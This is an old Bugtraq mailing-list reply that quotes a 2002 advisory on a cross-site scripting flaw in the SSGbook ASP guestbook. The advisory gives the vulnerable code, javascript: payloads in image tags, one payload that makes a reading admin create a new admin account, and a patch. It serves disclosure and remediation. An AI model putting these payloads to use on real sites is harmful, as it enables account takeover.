In-Reply-To: <F127ak1HTJcwXAtPyFC00019ee5@hotmail.com> This issue has been fixed >Received: (qmail 27350 invoked from network); 8 Oct 2002 17:28:07 -0000 >Received: from outgoing2.securityfocus.com (HELO outgoing.securityfocus.com) (205.206.231.26) > by mail.securityfocus.com with SMTP; 8 Oct 2002 17:28:07 -0000 >Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19]) > by outgoing.securityfocus.com (Postfix) with QMQP > id D0E078F2A1; Tue, 8 Oct 2002 10:36:42 -0600 (MDT) >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@securityfocus.com> >List-Help: <mailto:bugtraq-help@securityfocus.com> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> >List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Received: (qmail 25496 invoked from network); 8 Oct 2002 17:08:44 -0000 >X-Originating-IP: [80.236.134.100] >From: "Frog Man" <leseulfrog@hotmail.com> >To: bugtraq@securityfocus.com >Subject: SSGbook (ASP) >Date: Tue, 08 Oct 2002 19:31:54 +0200 >Mime-Version: 1.0 >Content-Type: text/plain; charset=iso-8859-1; format=flowed >Message-ID: <F127ak1HTJcwXAtPyFC00019ee5@hotmail.com> >X-OriginalArrivalTime: 08 Oct 2002 17:31:54.0466 (UTC) FILETIME=[9835BC20:01C26EF0] > >Informations : >°°°°°°°°°°°°°° >Product : SSGbook >Langage : ASP >Tested version : 1 >Website : http://www.script-shed.com >Problem : Cross Site Scripting > >PHP Code / location : >°°°°°°°°°°°°°°°°°°°°° >----------------- config.asp ---------------------- >fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>") >fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>") >fString = doCode(fString, "[img=right]","[/img=right]","<img align=right >src=""",""" id=right border=0>") >fString = doCode(fString, "[image=right]","[/image=right]","<img align=right >src=""",""" id=right border=0>") >fString = doCode(fString, "[img=left]","[/img=left]","<img align=left >src=""",""" id=left border=0>") >fString = doCode(fString, "[image=left]","[/image=left]","<img align=left >src=""",""" id=left border=0>") >----------------- config.asp ---------------------- > >Exploit : >°°°°°°°°° >[image]javascript:{SCRIPT}[/image] >[img=right]javascript:{SCRIPT}[/img=right] >[image=right]javascript:{SCRIPT}[/image=right] >[img=left]javascript:{SCRIPT}[/img=left] >[image=left]javascript:{SCRIPT}[/image=left] >[img]javascript:{SCRIPT}[/img] > > >e.g. : >[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image] > >Add an admin if an admin read it. Login : Pom, Password : turlututu > >Patch : >°°°°°°° >In config.asp : >Add this line : > > strOutput = Replace(strOutput, chr(34), """) > >after > >---------------------------------------------- > strOutput = Replace(strOutput, "<", "<") > strOutput = Replace(strOutput, ">", ">") >---------------------------------------------- > >And replace this lines : > > >------------------------------------------------ > fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>") > fString = doCode(fString, "[image]","[/image]","<img src=""",""" >border=0>") > fString = doCode(fString, "[img=right]","[/img=right]","<img align=right >src=""",""" id=right border=0>") > fString = doCode(fString, "[image=right]","[/image=right]","<img >align=right src=""",""" id=right border=0>") > fString = doCode(fString, "[img=left]","[/img=left]","<img align=left >src=""",""" id=left border=0>") > fString = doCode(fString, "[image=left]","[/image=left]","<img align=left >src=""",""" id=left border=0>") >------------------------------------------------ > > >by : > >------------------------------------------------ > fString = doCode(fString, "[img]http://","[/img]",";<img src=""http://","""; >border=0>") > fString = doCode(fString, "[image]http://","[/image]",";<img >src=""http://","""; border=0>") > fString = doCode(fString, "[img=right]http://","[/img=right]",";<img >align=right src=""http://","""; id=right border=0>") > fString = doCode(fString, "[image=right]http://","[/image=right]",";<img >align=right src=""http://","""; id=right border=0>") > fString = doCode(fString, "[img=left]http://","[/img=left]",";<img >align=left src=""http://","""; id=left border=0>") > fString = doCode(fString, "[image=left]http://","[/image=left]",";<img >align=left src=""http://","""; id=left border=0>") >------------------------------------------------ > > > > >More details in french : >http://www.frog-man.org/tutos/SSGbook.txt > >translated by Google : >http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools > > >frog-m@n > > >_________________________________________________________________ >Discutez en ligne avec vos amis ! http://messenger.msn.fr > >
